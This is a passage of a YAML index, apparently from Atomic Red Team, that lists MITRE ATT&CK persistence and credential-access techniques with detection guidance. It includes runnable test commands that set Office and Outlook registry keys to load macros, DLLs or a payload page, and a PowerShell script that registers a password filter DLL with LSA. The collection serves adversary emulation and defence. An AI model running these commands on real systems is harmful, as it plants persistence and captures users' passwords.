+ object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + description: |- + Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. + + [Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock) + name: Network Device Authentication + id: attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:11:00.356Z' + created: '2020-10-19T17:58:04.155Z' + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification) + + Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). 
+ x_mitre_data_sources: + - 'File: File Modification' + x_mitre_platforms: + - Network + atomic_tests: [] + T1037.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1037.003 + url: https://attack.mitre.org/techniques/T1037/003 + - source_name: Petri Logon Script AD + url: https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008 + description: Daniel Petri. (2009, January 8). Setting up a Logon Script through + Active Directory Users and Computers in Windows Server 2008. Retrieved November + 15, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Network Logon Script + description: "Adversaries may use network logon scripts automatically executed + at logon initialization to establish persistence. Network logon scripts can + be assigned using Active Directory or Group Policy Objects.(Citation: Petri + Logon Script AD) These logon scripts run with the privileges of the user they + are assigned to. Depending on the systems within the network, initializing + one of these scripts could apply to more than one or potentially all systems. + \ \n \nAdversaries may use these scripts to maintain persistence on a network. + Depending on the access configuration of the logon scripts, either local credentials + or an administrator account may be necessary." + id: attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-24T23:45:25.625Z' + created: '2020-01-10T18:01:03.666Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_detection: Monitor logon scripts for unusual access by abnormal users + or at abnormal times. 
Look for files added or modified by unusual accounts + outside of normal administration duties. Monitor running process for actions + that could be indicative of abnormal programs or executables running upon + logon. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Active Directory: Active Directory Object Modification' + x_mitre_platforms: + - Windows + atomic_tests: [] + T1137: + technique: + created: '2017-12-14T16:46:06.044Z' + modified: '2020-06-25T17:48:09.417Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1137 + url: https://attack.mitre.org/techniques/T1137 + - source_name: SensePost Ruler GitHub + url: https://github.com/sensepost/ruler + description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange + services. Retrieved February 4, 2019.' + - source_name: TechNet O365 Outlook Rules + url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/ + description: Koeller, B.. (2018, February 21). Defending Against Rules and + Forms Injection. Retrieved November 5, 2019. + - source_name: CrowdStrike Outlook Forms + url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746 + description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral + Movement and Persistence. Retrieved February 5, 2019. + - source_name: Outlook Today Home Page + url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943 + description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. + Retrieved February 5, 2019. 
+ - source_name: Microsoft Detect Outlook Forms + url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack + description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook + Rules and Custom Forms Injections Attacks in Office 365. Retrieved February + 4, 2019. + - source_name: SensePost NotRuler + url: https://github.com/sensepost/notruler + description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler, + provides blue teams with the ability to detect Ruler usage against Exchange. + Retrieved February 4, 2019. + description: |- + Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins. 
+ + A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules) + name: Office Application Startup + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53 + x_mitre_is_subtechnique: false + x_mitre_version: '1.2' + x_mitre_contributors: + - Nick Carr, FireEye + - Microsoft Threat Intelligence Center (MSTIC) + - Sahar Shukrun + - Praetorian + - Loic Jaquemet + - Ricardo Dias + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Application Log: Application Log Content' + x_mitre_detection: |- + Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously. + + Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. 
Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) + + Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) + x_mitre_permissions_required: + - User + - Administrator + x_mitre_platforms: + - Windows + - Office 365 + identifier: T1137 + atomic_tests: + - name: Office Application Startup - Outlook as a C2 + auto_generated_guid: bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c + description: "As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ + \nit is possible to use Outlook Macro as a way to achieve persistance and + execute arbitrary commands. 
This transform Outlook into a C2.\nToo achieve + this two things must happened on the syste\n- The macro security registry + value must be set to '4'\n- A file called VbaProject.OTM must be created in + the Outlook Folder.\n" + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 + if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ ) + echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f + del %APPDATA%\Microsoft\Outlook\VbaProject.OTM + name: command_prompt + T1137.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1137.001 + url: https://attack.mitre.org/techniques/T1137/001 + - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea + description: Microsoft. (n.d.). Change the Normal template (Normal.dotm). + Retrieved July 3, 2017. + source_name: Microsoft Change Normal Template + - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office + description: Austin, J. (2017, June 6). Getting Started with VBA in Office. + Retrieved July 3, 2017. + source_name: MSDN VBA in Office + - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/ + description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm. + Retrieved July 3, 2017. + source_name: enigma0x3 normal.dotm + - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/ + description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62. + Retrieved July 3, 2017. 
+ source_name: Hexacorn Office Template Macros + - source_name: GlobalDotName Jun 2019 + url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique + description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName + - A Stealthy Office Persistence Technique. Retrieved August 26, 2019. + - source_name: CrowdStrike Outlook Forms + url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746 + description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral + Movement and Persistence. Retrieved February 5, 2019. + - source_name: Outlook Today Home Page + url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943 + description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. + Retrieved February 5, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Office Template Macros + description: "Adversaries may abuse Microsoft Office templates to obtain persistence + on a compromised system. Microsoft Office contains templates that are part + of common Office applications and are used to customize styles. The base templates + within the application are used each time an application starts. (Citation: + Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications + (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base + template and used to execute code when the respective Office application starts + in order to obtain persistence. Examples for both Word and Excel have been + discovered and published. By default, Word has a Normal.dotm template created + that can be modified to include a malicious macro. 
Excel does not have a template + file created by default, but one can be added that will automatically be loaded.(Citation: + enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates + may also be stored and pulled from remote locations.(Citation: GlobalDotName + Jun 2019) \n\nWord Normal.dotm location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel + Personal.xlsb location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries + may also change the location of the base template to point to their own by + hijacking the application's search order, e.g. Word 2016 will first look for + Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, + or by modifying the GlobalDotName registry key. By modifying the GlobalDotName + registry key an adversary can specify an arbitrary location, file name, and + file extension to use for the template that will be loaded on application + startup. To abuse GlobalDotName, adversaries may first need to register the + template as a trusted document or place it in a trusted location.(Citation: + GlobalDotName Jun 2019) \n\nAn adversary may need to enable macros to execute + unrestricted depending on the system or enterprise security policy on use + of macros." + id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-06-25T17:48:08.916Z' + created: '2019-11-07T20:29:17.788Z' + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: 'Many Office-related persistence mechanisms require changes + to the Registry and for binaries, files, or scripts to be written to disk + or existing files modified to include malicious scripts. Collect events related + to Registry key creation and modification for keys that could be used for + Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook + Today Home Page) Modification to base templates, like Normal.dotm, should + also be investigated since the base templates should likely not contain VBA + macros. 
Changes to the Office macro security settings should also be investigated.(Citation: + GlobalDotName Jun 2019)' + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_platforms: + - Windows + - Office 365 + atomic_tests: [] + T1137.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1137.002 + url: https://attack.mitre.org/techniques/T1137/002 + - url: http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/ + description: Hexacorn. (2014, April 16). Beyond good ol’ Run key, Part 10. + Retrieved July 3, 2017. + source_name: Hexacorn Office Test + - url: https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/ + description: 'Falcone, R. (2016, July 20). Technical Walkthrough: Office Test + Persistence Method Used In Recent Sofacy Attacks. Retrieved July 3, 2017.' + source_name: Palo Alto Office Test Sofacy + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Office Test + description: |- + Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. 
This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy) + + There exist user and global Registry keys for the Office Test feature: + + * HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf + * HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf + + Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started. + id: attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-20T15:27:51.559Z' + created: '2019-11-07T19:44:04.475Z' + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_system_requirements: + - Office 2007, 2010, 2013, and 2016 + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy) + + Consider monitoring Office processes for anomalous DLL loads. 
+ x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + x_mitre_platforms: + - Windows + - Office 365 + identifier: T1137.002 + atomic_tests: + - name: Office Application Startup Test Persistence + auto_generated_guid: c3e35b58-fe1c-480b-b540-7600fb612563 + description: | + Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office + application is started. Key is used for debugging purposes. Not created by default & exist in HKCU & HKLM hives. + supported_platforms: + - windows + input_arguments: + thing_to_execute: + description: Thing to Run + type: Path + default: C:\Path\AtomicRedTeam.dll + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" + /t REG_SZ /d "#{thing_to_execute}" + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office + test\Special\Perf" + +' + name: command_prompt + T1137.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1137.003 + url: https://attack.mitre.org/techniques/T1137/003 + - source_name: SensePost Outlook Forms + url: https://sensepost.com/blog/2017/outlook-forms-and-shells/ + description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved + February 4, 2019. + - source_name: Microsoft Detect Outlook Forms + url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack + description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook + Rules and Custom Forms Injections Attacks in Office 365. Retrieved February + 4, 2019. + - source_name: SensePost NotRuler + url: https://github.com/sensepost/notruler + description: SensePost. (2017, September 21). 
NotRuler - The opposite of Ruler, + provides blue teams with the ability to detect Ruler usage against Exchange. + Retrieved February 4, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Outlook Forms + description: |- + Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms) + + Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms) + id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-26T17:35:15.823Z' + created: '2019-11-07T20:06:02.624Z' + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) + + Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. 
Non-standard process execution trees may also indicate suspicious or malicious behavior. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Application Log: Application Log Content' + x_mitre_platforms: + - Windows + - Office 365 + atomic_tests: [] + T1137.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1137.004 + url: https://attack.mitre.org/techniques/T1137/004 + - source_name: SensePost Outlook Home Page + url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/ + description: Stalmans, E. (2017, October 11). Outlook Home Page – Another + Ruler Vector. Retrieved February 4, 2019. + - source_name: Microsoft Detect Outlook Forms + url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack + description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook + Rules and Custom Forms Injections Attacks in Office 365. Retrieved February + 4, 2019. + - source_name: SensePost NotRuler + url: https://github.com/sensepost/notruler + description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler, + provides blue teams with the ability to detect Ruler usage against Exchange. + Retrieved February 4, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Outlook Home Page + description: | + Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. 
A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page) + + Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page) + id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-26T17:35:51.656Z' + created: '2019-11-07T20:09:56.536Z' + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) + + Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Application Log: Application Log Content' + x_mitre_platforms: + - Windows + - Office 365 + identifier: T1137.004 + atomic_tests: + - name: Install Outlook Home Page Persistence + auto_generated_guid: 7a91ad51-e6d2-4d43-9471-f26362f5738e + description: | + This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. 
+ + Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). + supported_platforms: + - windows + input_arguments: + url: + description: URL to Outlook Home Page containing the payload to execute + (can be local file:// or remote https://) + type: string + default: file://PathToAtomicsFolder\T1137.004\src\T1137.004.html + outlook_version: + description: Version of Outlook that is installed + type: string + default: 16.0 + outlook_folder: + description: Name of the Outlook folder to modify the homepage setting for + type: string + default: Inbox + executor: + name: command_prompt + elevation_required: false + command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} + /v URL /t REG_SZ /d #{url} /f + +' + cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} + /v URL /f + +' + T1137.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1137.005 + url: https://attack.mitre.org/techniques/T1137/005 + - source_name: SilentBreak Outlook Rules + url: https://silentbreaksecurity.com/malicious-outlook-rules/ + description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved + February 4, 2019. + - source_name: Microsoft Detect Outlook Forms + url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack + description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook + Rules and Custom Forms Injections Attacks in Office 365. Retrieved February + 4, 2019. + - source_name: SensePost NotRuler + url: https://github.com/sensepost/notruler + description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler, + provides blue teams with the ability to detect Ruler usage against Exchange. + Retrieved February 4, 2019. 
+ object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Outlook Rules + description: |- + Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules) + + Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules) + id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-26T17:36:15.923Z' + created: '2019-11-07T20:00:25.560Z' + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) + + Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. 
Non-standard process execution trees may also indicate suspicious or malicious behavior. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Application Log: Application Log Content' + x_mitre_platforms: + - Windows + - Office 365 + atomic_tests: [] + T1556.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1556.002 + url: https://attack.mitre.org/techniques/T1556/002 + - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html + description: Fuller, R. (2013, September 11). Stealing passwords every time + they change. Retrieved November 21, 2017. + source_name: Carnal Ownage Password Filters Sept 2013 + - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/ + description: Bialek, J. (2013, September 15). Intercepting Password Changes + With Function Hooking. Retrieved November 21, 2017. + source_name: Clymb3r Function Hook Passwords Sept 2013 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Password Filter DLL + description: "Adversaries may register malicious password filter dynamic link + libraries (DLLs) into the authentication process to acquire user credentials + as they are validated. \n\nWindows password filters are password policy enforcement + mechanisms for both domain and local accounts. Filters are implemented as + DLLs containing a method to validate potential passwords against password + policies. Filter DLLs can be positioned on local computers for local accounts + and/or domain controllers for domain accounts. Before registering new passwords + in the Security Accounts Manager (SAM), the Local Security Authority (LSA) + requests validation from each registered filter. Any potential changes cannot + take effect until every registered filter acknowledges validation. 
\n\nAdversaries + can register malicious password filters to harvest credentials from local + computers and/or entire domains. To perform proper validation, filters must + receive plain-text credentials from the LSA. A malicious password filter would + receive these plain-text credentials every time a password request is made.(Citation: + Carnal Ownage Password Filters Sept 2013)" + id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:11:55.147Z' + created: '2020-02-11T19:05:45.829Z' + x_mitre_data_sources: + - 'File: File Creation' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' + x_mitre_contributors: + - Vincent Le Toux + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: |- + Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference. + + Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013) + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + identifier: T1556.002 + atomic_tests: + - name: Install and Register Password Filter DLL + auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c + description: 'Uses PowerShell to install and register a password filter DLL. + Requires a reboot and administrative privileges. 
+ +' + supported_platforms: + - windows + input_arguments: + input_dll: + description: Path to DLL to be installed and registered + type: Path + default: PathToAtomicsFolder\T1556.002\src\AtomicPasswordFilter.dll + dependency_executor_name: powershell + dependencies: + - description: 'AtomicPasswordFilter.dll must exist on disk at specified location + (#{input_dll}) + +' + prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} + +' + get_prereq_command: 'Write-Host "You must provide your own password filter + dll" + +' + executor: + command: | + $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename + $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" + $notificationPackagesValues = $lsaKey.GetValue("Notification Packages") + $notificationPackagesValues += $passwordFilterName + Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues + Restart-Computer -Confirm + name: powershell + elevation_required: true + T1034: + technique: + id: attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Path Interception + description: |- + **This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).** + + Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. 
(Citation: TechNet MS14-019) + + There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. + + ### Unquoted Paths + Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018) + + ### PATH Environment Variable Misconfiguration + The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. 
